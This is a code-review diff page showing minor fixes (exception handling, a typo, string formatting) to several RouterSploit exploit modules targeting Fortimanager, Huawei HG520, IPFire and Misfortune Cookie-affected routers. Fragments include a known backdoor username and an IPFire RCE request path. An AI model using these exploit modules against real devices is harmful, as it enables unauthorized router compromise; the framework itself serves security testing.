trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler) trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
except: except Exception:
return False # target is not vulnerable return False # target is not vulnerable
return True # target is vulnerable return True # target is vulnerable
......
routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
...@@ -72,7 +72,7 @@ class Exploit(UDPClient): ...@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try: try:
print_status("Waiting for response") print_status("Waiting for response")
response = sock.recv(1024) response = sock.recv(1024)
except: except Exception:
print_error("Exploit failed - device seems to be not vulnerable") print_error("Exploit failed - device seems to be not vulnerable")
return return
...@@ -88,7 +88,7 @@ class Exploit(UDPClient): ...@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try: try:
response = sock.recv(1024) response = sock.recv(1024)
except: except Exception:
return False # target is not vulnerable return False # target is not vulnerable
if len(response): if len(response):
......
routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
...@@ -54,7 +54,7 @@ class Exploit(HTTPClient): ...@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2": "snort" "ACTION2": "snort"
} }
response = self.http_request( self.http_request(
method="POST", method="POST",
path="/cgi-bin/ids.cgi", path="/cgi-bin/ids.cgi",
headers=headers, headers=headers,
...@@ -81,7 +81,7 @@ class Exploit(HTTPClient): ...@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version = res[0][0] version = res[0][0]
update = int(res[0][1]) update = int(res[0][1])
if Version(version) <= Version("2.19") and udpate <= 110: if Version(version) <= Version("2.19") and update <= 110:
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
routersploit/modules/exploits/routers/multi/misfortune_cookie.py
...@@ -142,9 +142,9 @@ class Exploit(HTTPClient): ...@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if response is not None and response.status_code <= 302: if response is not None and response.status_code <= 302:
print_success( print_success(
"Seems good but check " "Seems good but check " +
+ "{}:{}".format(self.target, self.port) "{}:{} ".format(self.target, self.port) +
+ " using your browser to verify if authentication is disabled or not." "using your browser to verify if authentication is disabled or not."
) )
return True return True
else: else:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment